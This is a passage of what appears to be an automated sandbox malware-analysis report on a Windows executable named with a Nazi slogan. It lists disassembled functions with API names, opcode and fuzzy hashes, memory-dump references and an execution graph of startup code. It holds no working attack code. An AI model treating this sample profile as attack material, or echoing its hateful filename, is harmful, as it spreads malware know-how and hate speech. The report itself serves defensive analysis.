                                                                                                                                                                                                                                            • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                            • Instruction ID: cb4500abcac2290a2ecdb12b620301205265b60e94a368f1fe62eb829fa546cd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC21F772708B4191E7109B94F8467EA7360FB88784F805236EE8DA7756DF3CD255D740
                                                                                                                                                                                                                                            Function 00007FF633D7C5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                                                                                                            • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                            • Instruction ID: 4011ab1016f224084199e4224510aeb5237c71053e27409bc8eec7eb2664b866
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9D1FEB2B18A818EE750CFA5D4412AC37B1FB54B98B444336DE5EA7B99DF38E116D300
                                                                                                                                                                                                                                            Function 00007FF633D7F98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4170891091-0
                                                                                                                                                                                                                                            • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                            • Instruction ID: 546747b20ff5b2b5e960a0ff4e953700f2f0f40efcb574949882fd7f3944177b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7851C872F042118AFB24DFE4D9666BC2769AF44369F500336DD2DAABE5DF38A402D700
                                                                                                                                                                                                                                            Function 00007FF633D7577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2780335769-0
                                                                                                                                                                                                                                            • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                            • Instruction ID: b22458fa52191d5120275d4ec9f9ea44465807ec3a701729560ee272b97e6bff
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5951AD22E086418AFB10CFB1D4523BD37A2AB48B58F149639DE4DAB789DF38E4819341
                                                                                                                                                                                                                                            Function 00007FF633D620C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1956198572-0
                                                                                                                                                                                                                                            • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                            • Instruction ID: db1a6162a4bccb09ad1e453a8e51b53c1fea1e654d6ff293ae719b6ed9fb63b5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6911E921A0C54682F65487E9E5472796251EB88780FC45230DF6D97B9ACD2DE5D5A200
                                                                                                                                                                                                                                            Function 00007FF633D85B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID: ?
                                                                                                                                                                                                                                            • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                            • Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                            • Instruction ID: 3cb196903c5e56fc7d9eb1f85b8d271bd60e7ec9e6446d419ff1f1ad6365f8fe
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A411812A0828246FB619BA9D40237A67A2EF91BA4F145335EE5C9ABD5DF3CF4419B00
                                                                                                                                                                                                                                            Function 00007FF633D79014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D79046
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D7A948: RtlFreeHeap.NTDLL(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A95E
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D7A948: GetLastError.KERNEL32(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A968
                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF633D6CBA5), ref: 00007FF633D79064
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                            • API String ID: 3580290477-2243985011
                                                                                                                                                                                                                                            • Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                            • Instruction ID: 9701e2203530df1d37851d7f3befcf6e76ec76ec48aeee2e83f82e91ee57d9c5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5841C032A08B1286EB14DFA1D8420BD63A4EF447D0B554235ED4EE3B85CF3DE4A6E300
                                                                                                                                                                                                                                            Function 00007FF633D7CC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                            • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                            • Instruction ID: 19f18fa483c2f33693694605881a2da7bc54fe51dfafeebc5f756f4136fe1acb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD41A332B18A8185EB608F65E4453BA77A0FB88B84F944235EE4DD7798EF3CD441D740
                                                                                                                                                                                                                                            Function 00007FF633D7F5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                                            • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                            • Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                                            • Instruction ID: 8eb12bc165134f41b4cb3792588da0e60e246dae2e205a758614a1fe4bf5d5fe
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44212372A1868181EB308F51D44627D73B5FB88B84F864335DAADAB394DF7CE9849B40
                                                                                                                                                                                                                                            Function 00007FF633D6FD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                            • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                            • Instruction ID: 761cba639d03aea86463388cd1ad425dde15df9ba6ee47ac9c00dac230985bb0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A115B32608B8182EB218F55E400269B7E8FB88B98F584330EF9D5B769DF3CE5518B00
                                                                                                                                                                                                                                            Function 00007FF633D8073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                                            • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                            • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                            • Instruction ID: 09a25edd1726398f407d017423dcdbbfe3ab10e57d17ce13637819520ad46471
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F01A26291C30386F720AFE0A86327E63A0EF48744F801236D55DEA795EF3CE544AB14

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:2.2%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                                                            Total number of Nodes:732
                                                                                                                                                                                                                                            Total number of Limit Nodes:29
                                                                                                                                                                                                                                            execution_graph 83941 7ff633d6b81c 83942 7ff633d6ab1a 83941->83942 83944 7ff633d6ab96 83942->83944 83945 7ff633d6bd90 83942->83945 83946 7ff633d6bdb3 83945->83946 83947 7ff633d6bdd1 memcpy_s 83945->83947 83949 7ff633d7d5fc 83946->83949 83947->83944 83950 7ff633d7d647 83949->83950 83954 7ff633d7d60b _get_daylight 83949->83954 83957 7ff633d74f08 11 API calls _get_daylight 83950->83957 83951 7ff633d7d62e HeapAlloc 83953 7ff633d7d645 83951->83953 83951->83954 83953->83947 83954->83950 83954->83951 83956 7ff633d83590 EnterCriticalSection LeaveCriticalSection _get_daylight 83954->83956 83956->83954 83957->83953 83958 7ff633d6cc3c 83979 7ff633d6ce0c 83958->83979 83961 7ff633d6cd88 84130 7ff633d6d12c 7 API calls 2 library calls 83961->84130 83962 7ff633d6cc58 __scrt_acquire_startup_lock 83964 7ff633d6cd92 83962->83964 83969 7ff633d6cc76 __scrt_release_startup_lock 83962->83969 84131 7ff633d6d12c 7 API calls 2 library calls 83964->84131 83966 7ff633d6cc9b 83967 7ff633d6cd9d __GetCurrentState 83968 7ff633d6cd21 83985 7ff633d6d274 83968->83985 83969->83966 83969->83968 84127 7ff633d79b2c 45 API calls 83969->84127 83971 7ff633d6cd26 83988 7ff633d61000 83971->83988 83976 7ff633d6cd49 83976->83967 84129 7ff633d6cf90 7 API calls 83976->84129 83978 7ff633d6cd60 83978->83966 83980 7ff633d6ce14 83979->83980 83981 7ff633d6ce20 __scrt_dllmain_crt_thread_attach 83980->83981 83982 7ff633d6ce2d 83981->83982 83984 7ff633d6cc50 83981->83984 83982->83984 84132 7ff633d6d888 7 API calls 2 library calls 83982->84132 83984->83961 83984->83962 84133 7ff633d8a4d0 83985->84133 83989 7ff633d61009 83988->83989 84135 7ff633d75484 83989->84135 83991 7ff633d637fb 84142 7ff633d636b0 83991->84142 83998 7ff633d6391b 84246 7ff633d645c0 83998->84246 83999 7ff633d6383c 84241 7ff633d61c80 83999->84241 84003 7ff633d6385b 84214 7ff633d68830 84003->84214 84004 7ff633d6396a 84269 7ff633d62710 54 API calls _log10_special 84004->84269 84008 7ff633d6388e 84015 7ff633d638bb __vcrt_freefls 84008->84015 84245 7ff633d689a0 40 API calls __vcrt_freefls 84008->84245 84009 7ff633d6395d 84010 7ff633d63962 84009->84010 84011 7ff633d63984 84009->84011 84265 7ff633d7004c 84010->84265 84014 7ff633d61c80 49 API calls 84011->84014 84016 7ff633d639a3 84014->84016 84018 7ff633d68830 14 API calls 84015->84018 84026 7ff633d638de __vcrt_freefls 84015->84026 84020 7ff633d61950 115 API calls 84016->84020 84018->84026 84019 7ff633d63a0b 84272 7ff633d689a0 40 API calls __vcrt_freefls 84019->84272 84022 7ff633d639ce 84020->84022 84022->84003 84024 7ff633d639de 84022->84024 84023 7ff633d63a17 84273 7ff633d689a0 40 API calls __vcrt_freefls 84023->84273 84270 7ff633d62710 54 API calls _log10_special 84024->84270 84030 7ff633d6390e __vcrt_freefls 84026->84030 84271 7ff633d68940 40 API calls __vcrt_freefls 84026->84271 84028 7ff633d63a23 84274 7ff633d689a0 40 API calls __vcrt_freefls 84028->84274 84031 7ff633d68830 14 API calls 84030->84031 84032 7ff633d63a3b 84031->84032 84033 7ff633d63b2f 84032->84033 84034 7ff633d63a60 __vcrt_freefls 84032->84034 84276 7ff633d62710 54 API calls _log10_special 84033->84276 84044 7ff633d63aab 84034->84044 84275 7ff633d68940 40 API calls __vcrt_freefls 84034->84275 84037 7ff633d68830 14 API calls 84038 7ff633d63bf4 __vcrt_freefls 84037->84038 84039 7ff633d63c46 84038->84039 84040 7ff633d63d41 84038->84040 84041 7ff633d63cd4 84039->84041 84042 7ff633d63c50 84039->84042 84290 7ff633d644e0 49 API calls 84040->84290 84047 7ff633d68830 14 API calls 84041->84047 84277 7ff633d690e0 59 API calls _log10_special 84042->84277 84044->84037 84046 7ff633d63d4f 84050 7ff633d63d65 84046->84050 84051 7ff633d63d71 84046->84051 84048 7ff633d63ce0 84047->84048 84054 7ff633d63c61 84048->84054 84057 7ff633d63ced 84048->84057 84049 7ff633d63c55 84053 7ff633d63cb3 84049->84053 84049->84054 84291 7ff633d64630 84050->84291 84052 7ff633d61c80 49 API calls 84051->84052 84062 7ff633d63d2b __vcrt_freefls 84052->84062 84288 7ff633d68660 86 API calls 2 library calls 84053->84288 84278 7ff633d62710 54 API calls _log10_special 84054->84278 84061 7ff633d61c80 49 API calls 84057->84061 84058 7ff633d63dbc 84227 7ff633d69390 84058->84227 84059 7ff633d63cbb 84063 7ff633d63cc8 84059->84063 84064 7ff633d63cbf 84059->84064 84066 7ff633d63d0b 84061->84066 84062->84058 84068 7ff633d63da7 LoadLibraryExW 84062->84068 84063->84062 84064->84054 84066->84062 84067 7ff633d63d12 84066->84067 84289 7ff633d62710 54 API calls _log10_special 84067->84289 84068->84058 84069 7ff633d63dcf SetDllDirectoryW 84073 7ff633d63e02 84069->84073 84115 7ff633d63e52 84069->84115 84072 7ff633d63808 __vcrt_freefls 84279 7ff633d6c550 84072->84279 84075 7ff633d68830 14 API calls 84073->84075 84074 7ff633d64000 84077 7ff633d6400a PostMessageW GetMessageW 84074->84077 84078 7ff633d6402d 84074->84078 84081 7ff633d63e0e __vcrt_freefls 84075->84081 84076 7ff633d63f13 84302 7ff633d633c0 121 API calls 2 library calls 84076->84302 84077->84078 84232 7ff633d63360 84078->84232 84080 7ff633d63f1b 84080->84072 84082 7ff633d63f23 84080->84082 84084 7ff633d63eea 84081->84084 84088 7ff633d63e46 84081->84088 84303 7ff633d690c0 LocalFree 84082->84303 84301 7ff633d68940 40 API calls __vcrt_freefls 84084->84301 84088->84115 84294 7ff633d66dc0 54 API calls _get_daylight 84088->84294 84091 7ff633d64047 84305 7ff633d66fc0 FreeLibrary 84091->84305 84097 7ff633d64053 84100 7ff633d63e64 84295 7ff633d67340 117 API calls 2 library calls 84100->84295 84104 7ff633d63e79 84106 7ff633d63e9a 84104->84106 84118 7ff633d63e7d 84104->84118 84296 7ff633d66e00 120 API calls _log10_special 84104->84296 84106->84118 84297 7ff633d671b0 125 API calls 84106->84297 84111 7ff633d63eaf 84111->84118 84298 7ff633d674f0 55 API calls 84111->84298 84112 7ff633d63ed8 84300 7ff633d66fc0 FreeLibrary 84112->84300 84115->84074 84115->84076 84118->84115 84299 7ff633d62a50 54 API calls _log10_special 84118->84299 84127->83968 84128 7ff633d6d2b8 GetModuleHandleW 84128->83976 84129->83978 84130->83964 84131->83967 84132->83984 84134 7ff633d6d28b GetStartupInfoW 84133->84134 84134->83971 84136 7ff633d7f480 84135->84136 84138 7ff633d7f526 84136->84138 84139 7ff633d7f4d3 84136->84139 84307 7ff633d7f358 71 API calls _fread_nolock 84138->84307 84306 7ff633d7a814 37 API calls 2 library calls 84139->84306 84141 7ff633d7f4fc 84141->83991 84308 7ff633d6c850 84142->84308 84145 7ff633d636eb GetLastError 84315 7ff633d62c50 51 API calls _log10_special 84145->84315 84146 7ff633d63710 84310 7ff633d69280 FindFirstFileExW 84146->84310 84149 7ff633d63706 84154 7ff633d6c550 _log10_special 8 API calls 84149->84154 84151 7ff633d6377d 84318 7ff633d69440 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 